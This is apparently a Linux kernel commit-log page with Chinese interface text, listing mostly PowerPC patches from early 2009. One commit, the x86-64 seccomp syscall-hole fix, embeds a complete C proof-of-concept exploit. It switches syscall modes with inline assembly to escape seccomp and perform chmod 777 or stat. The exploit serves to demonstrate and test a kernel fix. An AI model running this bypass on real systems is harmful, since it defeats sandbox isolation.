1. 11 3月, 2009 6 次提交
  2. 09 3月, 2009 1 次提交
  3. 03 3月, 2009 1 次提交
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  4. 23 2月, 2009 9 次提交
  5. 15 2月, 2009 1 次提交
    • Y
      powerpc/44x: Support for 256KB PAGE_SIZE · e1240122
      Yuri Tikhonov 提交于
      This patch adds support for 256KB pages on ppc44x-based boards.
      
      For simplification of implementation with 256KB pages we still assume
      2-level paging. As a side effect this leads to wasting extra memory space
      reserved for PTE tables: only 1/4 of pages allocated for PTEs are
      actually used. But this may be an acceptable trade-off to achieve the
      high performance we have with big PAGE_SIZEs in some applications (e.g.
      RAID).
      
      Also with 256KB PAGE_SIZE we increase THREAD_SIZE up to 32KB to minimize
      the risk of stack overflows in the cases of on-stack arrays, which size
      depends on the page size (e.g. multipage BIOs, NTFS, etc.).
      
      With 256KB PAGE_SIZE we need to decrease the PKMAP_ORDER at least down
      to 9, otherwise all high memory (2 ^ 10 * PAGE_SIZE == 256MB) we'll be
      occupied by PKMAP addresses leaving no place for vmalloc. We do not
      separate PKMAP_ORDER for 256K from 16K/64K PAGE_SIZE here; actually that
      value of 10 in support for 16K/64K had been selected rather intuitively.
      Thus now for all cases of PAGE_SIZE on ppc44x (including the default, 4KB,
      one) we have 512 pages for PKMAP.
      
      Because ELF standard supports only page sizes up to 64K, then you should
      use binutils later than 2.17.50.0.3 with '-zmax-page-size' set to 256K
      for building applications, which are to be run with the 256KB-page sized
      kernel. If using the older binutils, then you should patch them like follows:
      
      	--- binutils/bfd/elf32-ppc.c.orig
      	+++ binutils/bfd/elf32-ppc.c
      
      	-#define ELF_MAXPAGESIZE                0x10000
      	+#define ELF_MAXPAGESIZE                0x40000
      
      One more restriction we currently have with 256KB page sizes is inability
      to use shmem safely, so, for now, the 256KB is available only if you turn
      the CONFIG_SHMEM option off (another variant is to use BROKEN).
      Though, if you need shmem with 256KB pages, you can always remove the !SHMEM
      dependency in 'config PPC_256K_PAGES', and use the workaround available here:
       http://lkml.org/lkml/2008/12/19/20Signed-off-by: NYuri Tikhonov <yur@emcraft.com>
      Signed-off-by: NIlya Yanok <yanok@emcraft.com>
      Signed-off-by: NJosh Boyer <jwboyer@linux.vnet.ibm.com>
      e1240122
  6. 13 2月, 2009 3 次提交
  7. 11 2月, 2009 2 次提交
    • B
      powerpc/mm: Rework I$/D$ coherency (v3) · 8d30c14c
      Benjamin Herrenschmidt 提交于
      This patch reworks the way we do I and D cache coherency on PowerPC.
      
      The "old" way was split in 3 different parts depending on the processor type:
      
         - Hash with per-page exec support (64-bit and >= POWER4 only) does it
      at hashing time, by preventing exec on unclean pages and cleaning pages
      on exec faults.
      
         - Everything without per-page exec support (32-bit hash, 8xx, and
      64-bit < POWER4) does it for all page going to user space in update_mmu_cache().
      
         - Embedded with per-page exec support does it from do_page_fault() on
      exec faults, in a way similar to what the hash code does.
      
      That leads to confusion, and bugs. For example, the method using update_mmu_cache()
      is racy on SMP where another processor can see the new PTE and hash it in before
      we have cleaned the cache, and then blow trying to execute. This is hard to hit but
      I think it has bitten us in the past.
      
      Also, it's inefficient for embedded where we always end up having to do at least
      one more page fault.
      
      This reworks the whole thing by moving the cache sync into two main call sites,
      though we keep different behaviours depending on the HW capability. The call
      sites are set_pte_at() which is now made out of line, and ptep_set_access_flags()
      which joins the former in pgtable.c
      
      The base idea for Embedded with per-page exec support, is that we now do the
      flush at set_pte_at() time when coming from an exec fault, which allows us
      to avoid the double fault problem completely (we can even improve the situation
      more by implementing TLB preload in update_mmu_cache() but that's for later).
      
      If for some reason we didn't do it there and we try to execute, we'll hit
      the page fault, which will do a minor fault, which will hit ptep_set_access_flags()
      to do things like update _PAGE_ACCESSED or _PAGE_DIRTY if needed, we just make
      this guys also perform the I/D cache sync for exec faults now. This second path
      is the catch all for things that weren't cleaned at set_pte_at() time.
      
      For cpus without per-pag exec support, we always do the sync at set_pte_at(),
      thus guaranteeing that when the PTE is visible to other processors, the cache
      is clean.
      
      For the 64-bit hash with per-page exec support case, we keep the old mechanism
      for now. I'll look into changing it later, once I've reworked a bit how we
      use _PAGE_EXEC.
      
      This is also a first step for adding _PAGE_EXEC support for embedded platforms
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      8d30c14c
    • M
  8. 29 1月, 2009 1 次提交
    • K
      powerpc/fsl-booke: Cleanup init/exception setup to be runtime · 105c31df
      Kumar Gala 提交于
      We currently have a few variants of fsl-booke processors (e500v1, e500v2,
      e500mc, and e200).  They all have minor differences that we had previously
      been handling via ifdefs.
      
      To move towards having this support the following changes have been made:
      
      * PID1, PID2 only exist on e500v1 & e500v2 and should not be accessed on
        e500mc or e200.  We use MMUCFG[NPIDS] to determine which case we are
        since we only touch PID1/2 in extremely early init code.
      
      * Not all IVORs exist on all the processors so introduce cpu_setup
        functions for each variant to setup the proper IVORs that are either
        unique or exist but have some variations between the processors
      Signed-off-by: NKumar Gala <galak@kernel.crashing.org>
      105c31df
  9. 16 1月, 2009 1 次提交
  10. 15 1月, 2009 1 次提交
  11. 14 1月, 2009 1 次提交
  12. 13 1月, 2009 1 次提交
  13. 08 1月, 2009 6 次提交
  14. 07 1月, 2009 4 次提交
  15. 01 1月, 2009 1 次提交
  16. 31 12月, 2008 1 次提交